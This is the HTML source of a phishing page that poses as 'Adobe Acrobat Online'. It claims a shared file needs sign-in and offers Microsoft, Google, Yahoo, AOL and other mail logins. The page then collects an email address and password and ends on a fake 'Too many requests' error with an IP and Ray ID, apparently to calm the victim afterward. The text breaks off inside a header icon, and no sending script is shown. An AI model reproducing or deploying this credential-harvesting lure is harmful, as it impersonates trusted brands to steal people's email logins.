<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        .progress {
  background: rgba(255,255,255,0.1);
  justify-content: flex-start;
  border-radius: 100px;
  align-items: center;
  position: relative;
  padding: 0 5px;
  display: flex;
  height: 10px;
  width: 150px;
}

.progress-value {
  animation: load 3s normal forwards;
  box-shadow: 0 10px 40px -10px #fff;
  border-radius: 100px;
  background: #2680EB;
  height: 8px;
  width: 0;
}

@keyframes load {
  0% { width: 0; }
  100% { width: 100%; }
}
    </style>
    <title>Adobe Acrobat Online</title>
</head>
<body class="bg-[#252525]">
    <div class="flex h-screen w-full bg-black bg-opacity-[50%] fixed items-center justify-center notif" style="z-index: 999; display: none;">
        <div class="bg-white px-8 py-6 flex flex-col shadow-lg border rounded-md">
            <div class="login-div rounded-[5px]">
                <div class="sm:hidden flex justify-center mb-5">
                    <svg xmlns="http://www.w3.org/2000/svg" id="Layer_1" data-name="Layer 1" width="154" height="40" viewBox="0 0 453.75 118.11" focusable="false">
                        <defs>
                            <style>.cls-2{fill:#000000;}</style>
                        </defs>
                        <path class="cls-2" d="M202,85.26l-4.89,15.08a1.1,1.1,0,0,1-1.12.82H184.12c-.71,0-.92-.41-.81-1L203.7,41.31a18.89,18.89,0,0,0,1-6.22.68.68,0,0,1,.61-.71h16.31c.51,0,.71.1.82.61l23.14,65.25c.2.51.1.92-.51.92H231.84a1,1,0,0,1-1.13-.71l-5.2-15.19Zm19.78-12.75c-2-6.73-6.12-19.06-8.05-26.3h-.1c-1.64,6.83-5.31,18-8,26.3Z" transform="translate(-6.07 -6.51)"/>
                        <path class="cls-2" d="M247.21,76.28c0-14.58,10.91-26.81,29.57-26.81.81,0,1.83.1,3.36.2V29.59a.64.64,0,0,1,.71-.71H293.7c.51,0,.61.2.61.61V89.74a56.68,56.68,0,0,0,.41,7.44c0,.51-.1.72-.71.92a51.21,51.21,0,0,1-20.09,4.08C258.83,102.18,247.21,93.62,247.21,76.28Zm32.93-14.47a10.53,10.53,0,0,0-3.77-.51c-7.85,0-14.58,4.79-14.58,14.27,0,10.09,5.81,14.48,13.56,14.48a14.38,14.38,0,0,0,4.79-.61Z" transform="translate(-6.07 -6.51)"/>
                        <path class="cls-2" d="M352.7,75.57c0,16-10.4,26.61-25.08,26.61-17.44,0-25.18-13.15-25.18-26.3,0-14.48,9.68-26.41,25.38-26.41C344.24,49.47,352.7,61.81,352.7,75.57Zm-35.89.1c0,9,4.18,14.68,11,14.68,5.92,0,10.4-5.09,10.4-14.47,0-8-3.26-14.58-11-14.58C321.3,61.3,316.81,66.6,316.81,75.67Z" transform="translate(-6.07 -6.51)"/>
                        <path class="cls-2" d="M374.13,28.88c.81,0,1,.1,1,.81v20.9a32.93,32.93,0,0,1,8.56-1.12c15,0,24.47,10.6,24.47,24.26,0,19.07-15.09,28.45-30.58,28.45a53.11,53.11,0,0,1-16-2.35,1.18,1.18,0,0,1-.61-1V29.59c0-.51.2-.71.71-.71Zm7,32.62a20.49,20.49,0,0,0-6,.82V90a16.11,16.11,0,0,0,3.77.4c7.75,0,14.78-4.69,14.78-15.29C393.7,65.78,388.3,61.5,381.16,61.5Z" transform="translate(-6.07 -6.51)"/>
                        <path class="cls-2" d="M428.11,79.55c.51,5.81,4.59,10.6,14.58,10.6a31.41,31.41,0,0,0,12.54-2.35c.31-.2.61-.1.61.51V98c0,.71-.2,1-.71,1.22-4.08,1.94-8.56,3-15.6,3-19.17,0-25.89-13.15-25.89-25.79,0-14.07,8.66-26.92,24.67-26.92,15.39,0,21.51,11.93,21.51,22a32.37,32.37,0,0,1-.51,6.83.88.88,0,0,1-.82.82,95.25,95.25,0,0,1-10.5.41Zm13.26-9.89a32.77,32.77,0,0,0,5.09-.21v-.71a8.29,8.29,0,0,0-8.66-8.06c-6.42,0-9.18,4.8-9.79,9Z" transform="translate(-6.07 -6.51)"/>
                        <polygon class="cls-2" points="84.13 0 133.46 0 133.46 118.11 84.13 0"/>
                        <polygon class="cls-2" points="49.37 0 0 0 0 118.11 49.37 0"/>
                        <polygon class="cls-2" points="66.75 43.53 98.18 118.11 77.58 118.11 68.18 94.36 45.18 94.36 66.75 43.53"/>
                    </svg>
                </div>
                <div class="bg-[#0D66D0] py-4 px-[17px] flex flex-row space-x-2 text-white info-div rounded-t-[5px]">
                    <div class="mt-2 mr-2">
                        <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <g clip-path="url(#clip0_1599_24)">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M9 0.75C4.44375 0.75 0.75 4.44375 0.75 9C0.75 13.5562 4.44375 17.25 9 17.25C13.5562 17.25 17.25 13.5562 17.25 9C17.25 4.44375 13.5562 0.75 9 0.75ZM8.625 4.5C8.42609 4.5 8.23532 4.57902 8.09467 4.71967C7.95402 4.86032 7.875 5.05109 7.875 5.25C7.875 5.44891 7.95402 5.63968 8.09467 5.78033C8.23532 5.92098 8.42609 6 8.625 6H9C9.19891 6 9.38968 5.92098 9.53033 5.78033C9.67098 5.63968 9.75 5.44891 9.75 5.25C9.75 5.05109 9.67098 4.86032 9.53033 4.71967C9.38968 4.57902 9.19891 4.5 9 4.5H8.625ZM7.5 7.5C7.30109 7.5 7.11032 7.57902 6.96967 7.71967C6.82902 7.86032 6.75 8.05109 6.75 8.25C6.75 8.44891 6.82902 8.63968 6.96967 8.78033C7.11032 8.92098 7.30109 9 7.5 9H8.25V11.25H7.5C7.30109 11.25 7.11032 11.329 6.96967 11.4697C6.82902 11.6103 6.75 11.8011 6.75 12C6.75 12.1989 6.82902 12.3897 6.96967 12.5303C7.11032 12.671 7.30109 12.75 7.5 12.75H10.5C10.6989 12.75 10.8897 12.671 11.0303 12.5303C11.171 12.3897 11.25 12.1989 11.25 12C11.25 11.8011 11.171 11.6103 11.0303 11.4697C10.8897 11.329 10.6989 11.25 10.5 11.25H9.75V8.25C9.75 8.05109 9.67098 7.86032 9.53033 7.71967C9.38968 7.57902 9.19891 7.5 9 7.5H7.5Z" fill="white"/>
                            </g>
                            <defs>
                            <clipPath id="clip0_1599_24">
                            <rect width="18" height="18" fill="white"/>
                            </clipPath>
                            </defs>
                            </svg>                        
                            
                    </div>
                    <div class="text-[14px] px-1 max-w-[400px]">
                        This file is only available to authorized recipients. Please sign in to gain access
                    </div>
                </div>
                <div class="px-12 pt-5 pb-4 bg-white rounded-b-[5px]">
                    <div class="select-provider">
                        <div class="flex flex-row mt-1 mb-5 space-x-2">
                            <div class="mt-4">
                                <svg width="100" height="1" viewBox="0 0 100 1" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <line y1="0.75" x2="100" y2="0.75" stroke="black" stroke-opacity="0.7" stroke-width="0.5"/>
                                    </svg>                                
                            </div>
                            <div class="text-xl font-medium text-center">
                                Select your provider
                            </div>
                            <div class="mt-4">
                                <svg width="100" height="1" viewBox="0 0 100 1" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <line y1="0.75" x2="100" y2="0.75" stroke="black" stroke-opacity="0.7" stroke-width="0.5"/>
                                    </svg>                                
                            </div>
                        </div>
                        <div class="flex flex-col items-center space-y-4 text-[14px]">
                            <div class="provider-pill-ms flex flex-row space-x-4 border border-black rounded-3xl px-8 py-3 cursor-pointer bg-gray-200 text-black w-[320px] justify-center hover:bg-[#0D66D0] hover:text-white">
                                <div class="provider-pill-ms flex flex-row space-x-4">
                                    <div class="logo">
                                        <svg width="20" height="20" viewBox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg">
                                            <g clip-path="url(#clip0_3048_841)">
                                            <path d="M9.50516 9.50516H0V0H9.50516V9.50516Z" fill="#F1511B"/>
                                            <path d="M20.0012 9.50516H10.4961V0H20.0012V9.50516Z" fill="#80CC28"/>
                                            <path d="M9.50492 20.0003H0V10.4951H9.50492V20.0003Z" fill="#00ADEF"/>
                                            <path d="M20.0012 20.0003H10.4961V10.4951H20.0012V20.0003Z" fill="#FBBC09"/>
                                            </g>
                                            <defs>
                                            <clipPath id="clip0_3048_841">
                                            <rect width="20" height="20" fill="white"/>
                                            </clipPath>
                                            </defs>
                                            </svg>
                                    </div>
                                    <div>
                                        Continue with Microsoft
                                    </div>
                                </div>
                            </div>
                            <div class="flex flex-row space-x-4 border border-black rounded-3xl px-10 py-3 cursor-pointer bg-gray-200 text-black w-[320px] justify-center hover:bg-[#0D66D0] hover:text-white">
                                <div class="provider-pill flex flex-row space-x-4">
                                    <div class="logo">
                                        <svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
                                            <path d="M19.9871 9.20438H19.2487V9.16634H10.9987V12.833H16.1792C15.4234 14.9675 13.3926 16.4997 10.9987 16.4997C7.96132 16.4997 5.4987 14.037 5.4987 10.9997C5.4987 7.9623 7.96132 5.49967 10.9987 5.49967C12.4007 5.49967 13.6763 6.02859 14.6475 6.89255L17.2403 4.29976C15.6031 2.77397 13.4132 1.83301 10.9987 1.83301C5.93641 1.83301 1.83203 5.93738 1.83203 10.9997C1.83203 16.062 5.93641 20.1663 10.9987 20.1663C16.061 20.1663 20.1654 16.062 20.1654 10.9997C20.1654 10.385 20.1021 9.78509 19.9871 9.20438Z" fill="#FFC107"/>
                                            <path d="M2.89062 6.73305L5.90233 8.94176C6.71725 6.92417 8.69083 5.49967 11.0004 5.49967C12.4024 5.49967 13.678 6.02859 14.6492 6.89255L17.242 4.29976C15.6048 2.77397 13.4149 1.83301 11.0004 1.83301C7.47946 1.83301 4.42604 3.8208 2.89062 6.73305Z" fill="#FF3D00"/>
                                            <path d="M11.0005 20.167C13.3682 20.167 15.5196 19.2609 17.1463 17.7873L14.3092 15.3866C13.3579 16.11 12.1956 16.5013 11.0005 16.5003C8.61622 16.5003 6.59176 14.98 5.82909 12.8584L2.83984 15.1615C4.35693 18.1301 7.43784 20.167 11.0005 20.167Z" fill="#4CAF50"/>
                                            <path d="M19.9884 9.20503H19.25V9.16699H11V12.8337H16.1805C15.819 13.8495 15.1678 14.7372 14.3073 15.387L14.3087 15.3861L17.1458 17.7869C16.945 17.9693 20.1667 15.5837 20.1667 11.0003C20.1667 10.3857 20.1034 9.78574 19.9884 9.20503Z" fill="#1976D2"/>
                                            </svg>
                                                                      
                                    </div>
                                    <div>
                                        Continue with Google
                                    </div>
                                </div>
                            </div>
                            <div class="flex flex-row space-x-5 border border-black rounded-3xl px-8 py-3 cursor-pointer bg-gray-200 text-black w-[320px] justify-center hover:bg-[#0D66D0] hover:text-white">
                                <div class="provider-pill flex flex-row space-x-4">
                                    <div class="logo">
                                        <svg width="26" height="19" viewBox="0 0 26 19" fill="none" xmlns="http://www.w3.org/2000/svg">
                                            <path d="M1 1H8.05882M6.64706 17.9412H16.5294M3.11765 1L10.8824 10.8824M10.8824 10.8824V17.9412M10.8824 10.8824L19.3529 3.82353M14.4118 3.82353H21.4706M25 8.05882V13.7059M25 17.9412V17.9553" stroke="#5F01D1" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"/>
                                            </svg>
                                            
                                    </div>
                                    <div class="">
                                        Continue with Yahoo
                                    </div>
                                </div>
                            </div>
                            <div class="flex flex-row space-x-5 border border-black rounded-3xl px-8 py-3 cursor-pointer bg-gray-200 text-black w-[320px] justify-center hover:bg-[#0D66D0] hover:text-white">
                                <div class="provider-pill flex flex-row space-x-4">
                                    <div class="logo">
                                        <svg width="28" height="28" viewBox="0 0 28 28" fill="none" xmlns="http://www.w3.org/2000/svg">
                                            <path d="M15.2483 10.8896C18.1953 10.8896 19.6117 13.2194 19.6117 15.2132C19.6117 17.2071 18.1953 19.5369 15.2483 19.5369C12.3013 19.5369 10.885 17.2071 10.885 15.2132C10.885 13.2194 12.3002 10.8896 15.2483 10.8896ZM15.2483 17.2654C16.2983 17.2654 17.1885 16.4009 17.1885 15.2132C17.1885 14.0256 16.2983 13.1611 15.2483 13.1611C14.1983 13.1611 13.307 14.0256 13.307 15.2132C13.307 16.4009 14.1983 17.2666 15.2483 17.2666M20.9802 8.46289H23.4348V19.3106H20.9802V8.46289ZM26.3678 16.1244C26.1536 16.1245 25.9416 16.1669 25.7438 16.249C25.5459 16.3311 25.3662 16.4514 25.2149 16.6029C24.9092 16.909 24.7377 17.324 24.738 17.7566C24.7383 18.1891 24.9104 18.6039 25.2165 18.9095C25.5226 19.2152 25.9376 19.3867 26.3702 19.3864C26.8027 19.3861 27.2175 19.2139 27.5231 18.9079C27.8288 18.6018 28.0003 18.1868 28 17.7542C27.9997 17.3217 27.8276 16.9069 27.5215 16.6013C27.2154 16.2956 26.8004 16.1241 26.3678 16.1244ZM6.45867 8.46289H4.27233L0 19.3082H2.89567L3.46733 17.7414H7.23567L7.763 19.3082H10.6867L6.45867 8.46289ZM4.23033 15.5422L5.36667 11.7599L6.503 15.5422H4.23033Z" fill="black"/>
                                            </svg>
                                            
                                    </div>
                                    <div class="mt-1">
                                        Continue with Aol
                                    </div>
                                </div>
                            </div>
                            <div class="flex flex-row space-x-5 border border-black rounded-3xl px-8 py-3 cursor-pointer bg-gray-200 text-black w-[320px] justify-center mb-2 hover:bg-[#0D66D0] hover:text-white">
                                <div class="provider-pill flex flex-row space-x-4">
                                    <div class="mt-1 logo">
                                        <svg width="20" height="15" viewBox="0 0 20 15" fill="none" xmlns="http://www.w3.org/2000/svg">
                                            <path fill-rule="evenodd" clip-rule="evenodd" d="M20 1.5C20 0.671573 19.3284 0 18.5 0H1.5C0.671573 0 0 0.671573 0 1.5V13.5C0 14.3284 0.671573 15 1.5 15H18.5C19.3284 15 20 14.3284 20 13.5V1.5ZM10.2851 7.59105L10.8243 8.40609C10.8244 8.40625 10.8246 8.40629 10.8248 8.40619V8.40619L10.826 8.40545L10.8307 8.40244L10.8497 8.39047L10.9239 8.34367L11.2051 8.16649C11.4471 8.0142 11.7918 7.79763 12.2024 7.54064C13.0238 7.02646 14.1075 6.35136 15.1591 5.70602C16.214 5.05868 17.2252 4.44827 17.9067 4.05973C18.2626 3.8568 18.481 3.74202 18.5683 3.70399L18.5721 3.70239C18.5632 3.70582 18.5413 3.71378 18.5105 3.72217C18.4879 3.72832 18.4077 3.74979 18.2982 3.75406L18.2972 3.7541C18.2355 3.75653 17.8738 3.77072 17.5742 3.48384C17.1979 3.12348 17.2854 2.67687 17.3314 2.53117C17.3788 2.38103 17.4521 2.2818 17.4694 2.2583L17.4697 2.25793V2.25793C17.5004 2.21637 17.5598 2.21575 17.5965 2.25213L18.7247 3.3713C18.8372 3.48285 19.0227 3.48879 19.1168 3.36137V3.36137C19.146 3.32176 19.2277 3.2085 19.2787 3.04672C19.3281 2.89018 19.4147 2.43567 19.0331 2.07025C18.7265 1.77668 18.3528 1.79047 18.2805 1.79329C18.1573 1.79811 18.0593 1.82285 18.0149 1.83495C17.9174 1.8615 17.8312 1.89736 17.7794 1.91991C17.5691 2.01142 17.2529 2.18424 16.9111 2.37915C16.197 2.78631 15.16 3.4126 14.1041 4.06055C13.045 4.7105 11.9554 5.38929 11.1313 5.90517C11.108 5.91978 11.0848 5.93425 11.0619 5.9486C10.5884 6.24512 9.98942 6.2551 9.50691 5.97342L6.78833 4.38642L6.78822 4.38635L6.75116 4.36316L6.61085 4.2752C6.49032 4.19957 6.31913 4.09199 6.11681 3.96433C5.7118 3.70878 5.18349 3.37374 4.68724 3.05389C4.18633 2.73104 3.73307 2.43327 3.47005 2.24827C3.40487 2.20243 3.35922 2.169 3.33079 2.14709L3.31517 2.13482C3.31025 2.1305 3.30738 2.12819 3.30717 2.12812C3.30696 2.12804 3.30942 2.1302 3.31517 2.13482C3.32834 2.14639 3.3562 2.17236 3.38683 2.20834C3.40347 2.22789 3.46312 2.29835 3.51378 2.40593L3.51446 2.40738C3.53974 2.46096 3.72927 2.86266 3.45537 3.3082C3.16331 3.78327 2.66419 3.80413 2.59281 3.80655C2.45881 3.8111 2.35881 3.78779 2.33277 3.78171V3.78171C2.2946 3.77279 2.27738 3.72984 2.29572 3.6952L3.19425 1.99786C3.1955 1.99549 3.19452 1.99255 3.19209 1.99141V1.99141C3.14001 1.967 3.0098 1.90594 2.87199 1.87374C2.83495 1.86509 2.72632 1.84062 2.58599 1.84538C2.5083 1.84802 2.00516 1.87046 1.71131 2.34844C1.43488 2.7981 1.62664 3.20498 1.65363 3.26223L1.65415 3.26335C1.70741 3.37644 1.7718 3.45368 1.79526 3.48124C1.88041 3.58129 1.98628 3.66272 2.02406 3.69178L2.02406 3.69178L2.02789 3.69473C2.08828 3.74127 2.15977 3.79298 2.23519 3.84602C2.53451 4.05656 3.0187 4.37402 3.51778 4.69569C4.02151 5.02036 4.55573 5.35914 4.96326 5.61627C5.1672 5.74495 5.33979 5.85342 5.46146 5.92977L5.60339 6.01873L5.64117 6.04238L5.65096 6.0485L5.65348 6.05008L5.65414 6.05049V6.05049C5.65423 6.05055 5.65436 6.05052 5.65443 6.05043L6.22757 5.22242L5.6628 6.03848C5.65822 6.0451 5.6601 6.05421 5.66693 6.05848V6.05848L5.67972 6.06595L9.73726 8.43459L10.0714 8.62962C10.199 8.70414 10.3576 8.70137 10.4825 8.62241V8.62241C10.6702 8.50386 10.7238 8.25426 10.6013 8.06913L10.2851 7.59105ZM17.5308 2.18518C17.5341 2.18194 17.5341 2.182 17.5308 2.18518V2.18518V2.18518ZM2.22276 3.74744C2.22264 3.74733 2.2253 3.74836 2.23112 3.75088C2.2258 3.74882 2.22289 3.74755 2.22276 3.74744Z" fill="#126BC5"/>
                                            </svg>
                                            
                                    </div>
                                    <div class="provider">
                                        Continue with Other Mail
                                    </div>
                                </div>
                            </div>
                            &nbsp;
                        </div>
                    </div>

                    <div class="email-step" style="display: none;">
                        <div class="text-[24px] mb-3 flex flex-row space-x-2">
                           <div class="selected-provider-logo mt-2"> 
                        </div> 
                            <div>
                                Sign in
                            </div> 
                            <div class="selected-provider"></div>
                        </div>
                        <div class="input-group mt-9 relative">
                            <div class="text-[12px] text-[#747474]">
                                Email address
                            </div>
                            <div class="border border-white border-b-[#EAEAEA] focus:border-b-[#0D66D0] email-div">
                                <input type="email" class="w-full outline-none py-1" id="email" autofocus>
                            </div>
                            <div class="absolute bottom-10 right-1 email-icon hidden">
                                <svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M8.58939 2.18784C8.35872 1.75184 7.64139 1.75184 7.41072 2.18784L1.41072 13.5212C1.35671 13.6228 1.32993 13.7366 1.333 13.8516C1.33607 13.9666 1.36887 14.0789 1.42822 14.1774C1.48757 14.276 1.57144 14.3575 1.67165 14.414C1.77187 14.4705 1.88501 14.5001 2.00005 14.4998H14.0001C14.115 14.5001 14.2281 14.4705 14.3282 14.414C14.4284 14.3576 14.5122 14.2761 14.5715 14.1776C14.6308 14.0791 14.6635 13.9669 14.6665 13.852C14.6696 13.7371 14.6427 13.6233 14.5887 13.5218L8.58939 2.18784ZM8.66672 12.4998H7.33339V11.1665H8.66672V12.4998ZM7.33339 9.83317V6.49984H8.66672L8.66739 9.83317H7.33339Z" fill="#d7373f"/>
                                    </svg>     
                            </div>
                            <div class="text-[14px] text-[#d7373f] mt-2 email-error hidden">
                                Please enter an email address
                            </div>
                        </div>
                        <div class="flex flex-row mt-10 justify-between mb-10 text-[14px]">
                            <div class="cursor-pointer text-[#0D66D0] pt-2 change-provider">
                                Choose another provider
                            </div>
                            <div class="">
                                <button type="button" class="next-button inline-flex items-center px-6 py-2 shadow rounded-[100px] text-white bg-[#0D66D0] transition ease-in-out duration-150">
                                    Continue
                                    <svg class="next-loading hidden animate-spin ml-4 mr-1 h-5 w-4 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                                      <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
                                      <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                                    </svg>
                                  </button>
                            </div>
                        </div>
                    </div>
                    <div class="pass-step" style="display: none;">
                        <div class="text-[24px] mb-3">
                            Enter your password
                        </div>
                        <div class="text-[16px] text-[#505050] font-[400] flex flex-row space-x-4">
                            <div class="w-16 h-16 flex justify-center rounded-lg">
                                <svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50" fill="none">
                                    <path d="M24.9993 39.5833C24.9982 37.1228 25.62 34.7021 26.8068 32.5468C27.9936 30.3915 29.7068 28.5718 31.7867 27.2574C33.8666 25.9429 36.2454 25.1764 38.7015 25.0294C41.1575 24.8824 43.6108 25.3596 45.8327 26.4166V12.4999C45.8327 10.2083 43.9577 8.33325 41.666 8.33325H8.33268C6.04102 8.33325 4.16602 10.2083 4.16602 12.4999V37.4999C4.16602 39.7916 6.04102 41.6666 8.33268 41.6666H25.166C25.0618 40.9791 24.9993 40.2916 24.9993 39.5833ZM8.33268 12.4999L24.9993 22.9166L41.666 12.4999V16.6666L24.9993 27.0833L8.33268 16.6666V12.4999ZM36.1243 45.8333L28.7493 38.4582L31.6868 35.5207L36.1035 39.9374L44.9368 31.1041L47.916 34.0416L36.1243 45.8333Z" fill="#126BC5"/>
                                  </svg>
                            </div>
                            <div class="pt-4 email-transfer">
                                john@doe.com
                            </div>
                        </div>
                        <div class="input-group mt-4 relative">
                            <div class="text-[12px] text-[#747474]">
                                Password
                            </div>
                            <div class="border border-white border-b-[#EAEAEA] focus:border-b-[#0D66D0] password-div">
                                <input type="password" class="w-full outline-none py-1" id="password" autofocus>
                            </div>
                            <div class="absolute bottom-10 right-1 password-icon hidden">
                                <svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M8.58939 2.18784C8.35872 1.75184 7.64139 1.75184 7.41072 2.18784L1.41072 13.5212C1.35671 13.6228 1.32993 13.7366 1.333 13.8516C1.33607 13.9666 1.36887 14.0789 1.42822 14.1774C1.48757 14.276 1.57144 14.3575 1.67165 14.414C1.77187 14.4705 1.88501 14.5001 2.00005 14.4998H14.0001C14.115 14.5001 14.2281 14.4705 14.3282 14.414C14.4284 14.3576 14.5122 14.2761 14.5715 14.1776C14.6308 14.0791 14.6635 13.9669 14.6665 13.852C14.6696 13.7371 14.6427 13.6233 14.5887 13.5218L8.58939 2.18784ZM8.66672 12.4998H7.33339V11.1665H8.66672V12.4998ZM7.33339 9.83317V6.49984H8.66672L8.66739 9.83317H7.33339Z" fill="#d7373f"/>
                                    </svg>     
                            </div>
                            <div class="text-[14px] text-[#d7373f] mt-2 password-error hidden">
                                Please enter your password
                            </div>
                        </div>
                        <div class="flex flex-row mt-4 justify-between mb-8 text-[14px]">
                            <div class="flex flex-row space-x-2">
                                <div class="back mt-2 text-[#1473e6] text-[14px] cursor-pointer">
                                    Sign in to another account
                                </div>
                            </div>
                            <div class="submit-div">
                                <div class="">
                                    <button type="button" class="submit-button inline-flex items-center px-6 py-2 shadow rounded-[100px] text-white bg-[#0D66D0] transition ease-in-out duration-150">
                                        Continue
                                        <svg class="animate-spin ml-4 mr-1 h-5 w-4 text-white submit-loading hidden" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                                          <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
                                          <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                                        </svg>
                                      </button>
                                </div>
                            </div>
                        </div>
                    </div>
    
                    <div class="final-step hidden">
                        <div class="text-[36px] mb-3 text-center">
                            Too many requests
                        </div>
                        <div class="text-[16px] text-[#505050] font-[400] flex flex-row space-x-4">
                            <div class="flex justify-center w-full">
                                <img src="https://auth.services.adobe.com/img/generic/S_Illu_SomethingWentWrong.svg" alt="" id="email-logo">
                            </div>
                        </div>
                        <div class="input-group mt-9 relative">
    
                        </div>
                        <div class="">
                            We could not authorize access to this file. Please contact the sender
                        </div>
                        <hr>
                        <div class="mb-10">
                            <div class="font-bold mb-4 mt-2">
                                Additional information
                            </div>
                            <div class="text-[] text-[14px] flex flex-row">
                                <div>Date:</div>
                                <div id="date" class="pl-10"></div>
                            </div>
                            <div class="text-[] text-[14px] flex flex-row space-x-3">
                                <div>IP Address:</div>
                                <div id="ip"></div>
                            </div>
                            <div class="text-[] text-[14px] flex flex-row space-x-3">
                                <div>Ray ID:</div>
                                <div id="id" class="pl-6">1903943-ACHA283-A11222</div>
                            </div>
                        </div>
                    </div>
    
                </div>
            </div>
        </div>
    </div>
    <div class="p-2 bg-[#323232] flex flex-row justify-between border border-[#323232] border-b-[rgba(255,255,255,0.3)] border-b-2 border-r-0" id="header">
        <div id="first" class="flex flex-row">
            <div class="p-2 pt-3 pl-4">
                <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_2421_599)">
                    <path d="M4.24284 0H19.7571C22.1143 0 24 1.88569 24 4.24284V19.7572C24 22.1143 22.1143 24 19.7571 24H4.24284C1.88569 24 0 22.1143 0 19.7572V4.24284C0 1.88569 1.88569 0 4.24284 0Z" fill="#B30B00"/>
                    <path d="M19.1386 13.8429C18.0242 12.6858 14.9814 13.1572 14.2529 13.2429C13.1815 12.2143 12.453 10.9715 12.1958 10.5429C12.5815 9.38576 12.8385 8.22861 12.8815 6.98586C12.8815 5.91439 12.4529 4.75732 11.2529 4.75732C10.8243 4.75732 10.4385 5.01439 10.2242 5.35723C9.71001 6.25732 9.92423 8.05732 10.7385 9.90017C10.2672 11.2287 9.83854 12.5144 8.63854 14.7859C7.3957 15.3 4.78139 16.5001 4.56707 17.7859C4.48139 18.1715 4.60992 18.5573 4.90992 18.8572C5.20992 19.1144 5.59561 19.2429 5.98139 19.2429C7.56707 19.2429 9.10992 17.0573 10.1814 15.2143C11.0814 14.9144 12.4957 14.4858 13.91 14.2286C15.5814 15.6858 17.0385 15.9 17.81 15.9C18.8385 15.9 19.2243 15.4715 19.3529 15.0857C19.5671 14.6572 19.4385 14.1858 19.1386 13.8429V13.8429ZM18.0671 14.5715C18.0242 14.8715 17.6386 15.1715 16.9529 15.0001C16.1385 14.7859 15.41 14.4001 14.7672 13.8858C15.3243 13.8 16.5671 13.6715 17.4672 13.8429C17.81 13.9286 18.1529 14.1429 18.0671 14.5715V14.5715ZM10.91 5.74292C10.9957 5.61439 11.1243 5.5287 11.2529 5.5287C11.6385 5.5287 11.7242 6.00007 11.7242 6.38586C11.6814 7.28595 11.5099 8.18586 11.21 9.04301C10.5671 7.3287 10.6957 6.12861 10.91 5.74292V5.74292ZM10.8243 14.0572C11.1672 13.3715 11.6386 12.1715 11.81 11.6571C12.1957 12.2999 12.8385 13.0715 13.1815 13.4143C13.1815 13.4572 11.8529 13.7143 10.8243 14.0572ZM8.2957 15.7715C7.31001 17.4001 6.28139 18.4286 5.72423 18.4286C5.63854 18.4286 5.55276 18.3858 5.46707 18.3429C5.33845 18.2571 5.29561 18.1286 5.33845 17.9572C5.46707 17.3572 6.58139 16.5429 8.2957 15.7715V15.7715Z" fill="white"/>
                    </g>
                    <defs>
                    <clipPath id="clip0_2421_599">
                    <rect width="24" height="24" fill="white"/>
                    </clipPath>
                    </defs>
                </svg>
            </div>
            <div class="mt-3 pl-1">
                <svg width="1" height="24" viewBox="0 0 1 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <line x1="0.5" y1="2.18558e-08" x2="0.499999" y2="24" stroke="#CDCDCD" stroke-opacity="0.2"/>
                    </svg>                    
            </div>
            <div class="flex flex-row ml-3 mt-[9px]">
                <div class="sign-in-icon">
                    <svg width="26" height="28" viewBox="0 0 26 28" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <g clip-path="url(#clip0_2421_617)">
                        <path d="M13 22.25C11.3683 22.25 9.77325 21.7661 8.41655 20.8596C7.05984 19.9531 6.00242 18.6646 5.378 17.1571C4.75357 15.6497 4.5902 13.9909 4.90853 12.3905C5.22685 10.7902 6.01259 9.32016 7.16637 8.16637C8.32016 7.01259 9.79017 6.22685 11.3905 5.90853C12.9909 5.5902 14.6497 5.75357 16.1571 6.378C17.6646 7.00242 18.9531 8.05984 19.8596 9.41655C20.7661 10.7733 21.25 12.3683 21.25 14C21.25 16.188 20.3808 18.2865 18.8336 19.8336C17.2865 21.3808 15.188 22.25 13 22.25ZM13 7.25C11.665 7.25 10.3599 7.64588 9.2499 8.38758C8.13987 9.12928 7.27471 10.1835 6.76382 11.4169C6.25293 12.6503 6.11925 14.0075 6.3797 15.3169C6.64015 16.6262 7.28303 17.829 8.22703 18.773C9.17104 19.717 10.3738 20.3599 11.6831 20.6203C12.9925 20.8808 14.3497 20.7471 15.5831 20.2362C16.8165 19.7253 17.8707 18.8601 18.6124 17.7501C19.3541 16.6401 19.75 15.335 19.75 14C19.75 12.2098 19.0388 10.4929 17.773 9.22703C16.5071 7.96116 14.7902 7.25 13 7.25Z" fill="#E3E3E3" fill-opacity="0.8"/>
